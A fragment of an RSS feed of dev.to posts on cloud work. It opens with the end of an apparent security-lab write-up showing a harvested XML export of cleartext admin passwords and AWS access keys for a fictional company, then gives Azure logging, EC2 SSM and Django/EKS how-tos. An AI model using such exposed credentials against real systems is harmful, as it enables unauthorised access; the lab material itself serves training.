&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We see even more privileged credentials!&lt;/p&gt;

&lt;p&gt;Take note of the &lt;code&gt;AWS IT Admin&lt;/code&gt; credentials. &lt;/p&gt;

&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CredentialsExport&amp;gt;
    &amp;lt;!-- Oracle Database Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Oracle Database&amp;lt;/ServiceType&amp;gt;
        &amp;lt;Hostname&amp;gt;oracle-db-server02.prod.hl-internal.com&amp;lt;/Hostname&amp;gt;
        &amp;lt;Username&amp;gt;admin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;Password123!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Primary Oracle database for the financial application. Ensure strong password policy.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- HP Server Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;HP Server Cluster&amp;lt;/ServiceType&amp;gt;
        &amp;lt;Hostname&amp;gt;hp-cluster1.prod.hl-internal.com&amp;lt;/Hostname&amp;gt;
        &amp;lt;Username&amp;gt;root&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;RootPassword456!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;HP server cluster for batch jobs. Periodically rotate this password.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- AWS Production Credentials --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;AWS IT Admin&amp;lt;/ServiceType&amp;gt;
        &amp;lt;AccountID&amp;gt;794929857501&amp;lt;/AccountID&amp;gt;
        &amp;lt;AccessKeyID&amp;gt;AKIA3SFMDAPOQRFWFGCD&amp;lt;/AccessKeyID&amp;gt;
        &amp;lt;SecretAccessKey&amp;gt;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&amp;lt;/SecretAccessKey&amp;gt;
        &amp;lt;Notes&amp;gt;AWS credentials for production workloads. Do not share these keys outside of the organization.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Iron Mountain Backup Portal --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Iron Mountain Backup&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://backupportal.ironmountain.com&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;hladmin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;HLPassword789!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Account used to schedule tape collections and deliveries. Schedule regular password rotations.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Office 365 Admin Account --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Office 365&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://admin.microsoft.com&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;admin@company.onmicrosoft.com&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;O365Password321!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Office 365 global admin account. Use for essential administrative tasks only and enable MFA.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
    &amp;lt;!-- Jira Admin Account --&amp;gt;
    &amp;lt;CredentialEntry&amp;gt;
        &amp;lt;ServiceType&amp;gt;Jira&amp;lt;/ServiceType&amp;gt;
        &amp;lt;URL&amp;gt;https://hugelogistics.atlassian.net&amp;lt;/URL&amp;gt;
        &amp;lt;Username&amp;gt;jira_admin&amp;lt;/Username&amp;gt;
        &amp;lt;Password&amp;gt;JiraPassword654!&amp;lt;/Password&amp;gt;
        &amp;lt;Notes&amp;gt;Jira administrative account. Restrict access and consider using API tokens where possible.&amp;lt;/Notes&amp;gt;
    &amp;lt;/CredentialEntry&amp;gt;
&amp;lt;/CredentialsExport&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;AWS IT Admin&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Access Key: &lt;code&gt;AKIA3SFMDAPOQRFWFGCD&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Secret Key: &lt;code&gt;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&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We can now see an export of user credit card information in cleartext!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiimk9q5z2r5xsicz3sep.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiimk9q5z2r5xsicz3sep.png" alt="Image description" width="800" height="590"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Creating a Data Collection Rule to populate "Event" logs in Azure</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Wed, 11 Sep 2024 01:48:27 +0000</pubDate>
      <link>https://dev.to/aktran321/troubleshooting-ms-sql-brute-force-attempts-4djc</link>
      <guid>https://dev.to/aktran321/troubleshooting-ms-sql-brute-force-attempts-4djc</guid>
      <description>&lt;p&gt;Multiple people have been running into the issue of the Event table in Azure not showing up in their Logs Analytics Workspace, they haven't been able to produce the heat map to visualize where attacks into their MS SQL server are coming from. &lt;/p&gt;

&lt;p&gt;To get the "Event" table to properly query, we can create a new Data Collection Rule.&lt;/p&gt;

&lt;p&gt;To do this, &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;navigate to your Log Analytic's Workspace -&amp;gt; Agent &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;click "Data Collection Rules"&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fncosr8gbozxj5n0pm5gx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fncosr8gbozxj5n0pm5gx.png" alt="Data Collection Rules View Button" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This will take you to a window showing all your Data Collection Rules. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click the "Create" button on the top left to create a new rule.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5g2q3ydr4bqzoo3ox5u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5g2q3ydr4bqzoo3ox5u.png" alt="Create Data Collection Rule Button" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Next, create a name and specify your subscription, resource group, and region. Platform Type should be "All"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fem13zt3xuo6m79qs8tuh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fem13zt3xuo6m79qs8tuh.png" alt="Basic Config" width="800" height="584"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to "&amp;lt; Next : Resource &amp;gt;"&lt;/li&gt;
&lt;li&gt;Hit "Add Resources" on the top left&lt;/li&gt;
&lt;li&gt;Select both our linux and windows virtual machines&lt;/li&gt;
&lt;li&gt;hit "Apply"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp1td539o0liyfn5ik7mc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp1td539o0liyfn5ik7mc.png" alt="Resources" width="800" height="297"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(Hopefully you're using Ubuntu Version 22.04, as the 24.04 has been causing problems with data collection agents as of recently...September 10th, 2024.)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;In the "Collect and deliver" window, we hit "Add data resource"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Data Source Type: "Linux Syslog"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;set "LOG_AUTH" to "LOG_DEBUG"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You should also manually set all other facility options to "None"&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiog4pt6pttt8y4pn52wz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiog4pt6pttt8y4pn52wz.png" alt="Collect and Deliver Config" width="800" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Now in the same window, we hit "Destination" and set it to our Log Analytics Workspace.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3zj5n22nz6f0uvoxd57.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3zj5n22nz6f0uvoxd57.png" alt="Destination" width="800" height="478"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Add the data source.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, we create another data source for our windows vm.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Data Source Type: Windows Event Logs&lt;/li&gt;
&lt;li&gt;Choose "Basic" for log collection configuration settings
Check the following boxes:&lt;/li&gt;
&lt;li&gt;Information&lt;/li&gt;
&lt;li&gt;Audit Success&lt;/li&gt;
&lt;li&gt;Audit Failure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgcdvdpll2c4mtxozupcg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgcdvdpll2c4mtxozupcg.png" alt="Windows VM Data Resource" width="800" height="781"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the custom tab, we want to add 2 xpath queries:&lt;/p&gt;

&lt;p&gt;Windows Defender Malware Detection XPath Query&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Microsoft-Windows-Windows Defender/Operational!*[System[(EventID=1116 or EventID=1117)]]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Windows Firewall Tampering Detection XPath Query&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Microsoft-Windows-Windows Firewall With Advanced Security/Firewall!*[System[(EventID=2003)]]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These will forward logs when malware is detected or when firewalls are being tampered with.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6twxn1cjmimlf160ibpv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6twxn1cjmimlf160ibpv.png" alt="xpath queries" width="800" height="638"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click next and configure the destination like we did before&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faz8g3vwqotyl9f50iozl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faz8g3vwqotyl9f50iozl.png" alt="windows vm destination config" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At this point, you are good to create your Data Collection Rule&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qr1navn0u7zuhp1cxq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qr1navn0u7zuhp1cxq2.png" alt="Final Review" width="800" height="1006"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw51ir5b5kcz2anny17.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw51ir5b5kcz2anny17.png" alt="Creation of DCR" width="800" height="391"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, when "Event" is queried, it shows up in our Log Analytics Workspace&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb0xk24llfypn89notmi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb0xk24llfypn89notmi.png" alt="Event Query" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>How to Connect to an EC2 Instance with SSM</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 30 Aug 2024 21:41:18 +0000</pubDate>
      <link>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-with-ssm-598h</link>
      <guid>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-with-ssm-598h</guid>
      <description>&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Launch an EC2 instance. (Preferably with an AMI using Amazon Linux 2023 or later)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create an IAM role, and attach the policy "AmazonSSMManagedInstanceCore"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Attach the role to your EC2 instance&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Go to your instance, click "connect" and choose "Session Manager"&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The benefits of connecting to your EC2 instance through Session Manager is that doesn't require you to open any ports to connect. This reduces the attack surface of your systems providing more security to your network. &lt;/p&gt;

&lt;p&gt;Tip: After you created your EC2 instance, you can check if it has the SSM agent installed by connecting with Direct Connect first and then running the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl status amazon-ssm-agent
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should get an output like this&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkhakqkxwvdbdl8ua9ls4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkhakqkxwvdbdl8ua9ls4.png" alt="Direct Connect Output" width="800" height="190"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>How to Connect to an EC2 Instance in a Private Subnet</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Sun, 14 Jul 2024 05:15:16 +0000</pubDate>
      <link>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-in-a-private-subnet-13cm</link>
      <guid>https://dev.to/aktran321/how-to-connect-to-an-ec2-instance-in-a-private-subnet-13cm</guid>
      <description>&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;p&gt;Before you start, ensure you have the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An EC2 instance running in a private subnet.&lt;/li&gt;
&lt;li&gt;AWS Systems Manager (SSM) Agent installed and running on the instance.&lt;/li&gt;
&lt;li&gt;An IAM role attached to the instance with the necessary permissions to use SSM.&lt;/li&gt;
&lt;li&gt;AWS CLI configured on your local machine.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Step 1: Attach an IAM Role to the EC2 Instance
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Create an IAM Role&lt;/strong&gt; (if you don’t have one):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to the &lt;strong&gt;IAM&lt;/strong&gt; service in the AWS Management Console.&lt;/li&gt;
&lt;li&gt;Choose &lt;strong&gt;Roles&lt;/strong&gt; and then &lt;strong&gt;Create role&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Select &lt;strong&gt;AWS service&lt;/strong&gt; and choose &lt;strong&gt;EC2&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attach the &lt;strong&gt;AmazonEC2RoleforSSM&lt;/strong&gt; managed policy.&lt;/li&gt;
&lt;li&gt;Name your role and complete the creation process.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Attach the IAM Role to your EC2 Instance&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to the &lt;strong&gt;EC2 Dashboard&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Select your instance.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Actions&lt;/strong&gt; &amp;gt; &lt;strong&gt;Security&lt;/strong&gt; &amp;gt; &lt;strong&gt;Modify IAM Role&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attach the IAM role you created or an existing role with the necessary SSM permissions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Step 2: Verify SSM Agent Installation
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Check if SSM Agent is Installed&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Connect to your instance using an existing method (if possible) or check the instance launch configuration.&lt;/li&gt;
&lt;li&gt;For Amazon Linux, the SSM Agent is pre-installed. For other AMIs, you might need to install it manually.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Install SSM Agent Manually&lt;/strong&gt; (if not installed):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;For Amazon Linux:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;yum &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; amazon-ssm-agent
 &lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl start amazon-ssm-agent
 &lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl &lt;span class="nb"&gt;enable &lt;/span&gt;amazon-ssm-agent
&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Step 3: Connect to the Instance Using SSM
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configure AWS CLI&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Open your terminal or command prompt.&lt;/li&gt;
&lt;li&gt;Configure the AWS CLI with your credentials and default region:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; aws configure
&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Follow the prompts to enter your AWS Access Key ID, Secret Access Key, Default region name (e.g., us-east-1), and Default output format (e.g., json).&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Start an SSM Session&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use the following command to start a session with your instance:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; aws ssm start-session &lt;span class="nt"&gt;--target&lt;/span&gt; &amp;lt;instance-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Replace &lt;code&gt;&amp;lt;instance-id&amp;gt;&lt;/code&gt; with the actual instance ID of your EC2 instance in the private subnet.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example
&lt;/h3&gt;

&lt;p&gt;Assuming your instance ID is &lt;code&gt;i-0a677d0c4370bebab&lt;/code&gt;, you would run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ssm start-session --target i-0a677d0c4370bebab
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We are now connected and can run simple commands like &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;uptime&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqi2zkfbipaiou84mh3i6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqi2zkfbipaiou84mh3i6.png" alt="Image description" width="800" height="128"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Note: If you have trouble for any reason, you can reference this &lt;a href="https://aws.amazon.com/solutions/implementations/linux-bastion/" rel="noopener noreferrer"&gt;deployment guide&lt;/a&gt; and use the CloudFormation template provided.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Deploying a Django App to Kubernetes with Amazon ECR and EKS</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 12 Jul 2024 20:37:48 +0000</pubDate>
      <link>https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736</link>
      <guid>https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736</guid>
      <description>&lt;p&gt;Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes.&lt;/p&gt;

&lt;p&gt;I have a simple setup. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4n8h5mehpkwtyy5fkwps.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4n8h5mehpkwtyy5fkwps.png" alt="Image description" width="474" height="292"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A directory with cloned git repo and a virtual environment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftykkpg12x5kouv9syxdg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftykkpg12x5kouv9syxdg.png" alt="Image description" width="484" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;"kubesite" is the django project.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwll87rm6wz2bzxrmv7r7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwll87rm6wz2bzxrmv7r7.png" alt="Image description" width="482" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And within it, I created an app that displays "Hello, world!", routed to the /hello path.&lt;/p&gt;

&lt;p&gt;Once I verified that the application works, I created my requirements.txt file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip freeze &amp;gt; requirements.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



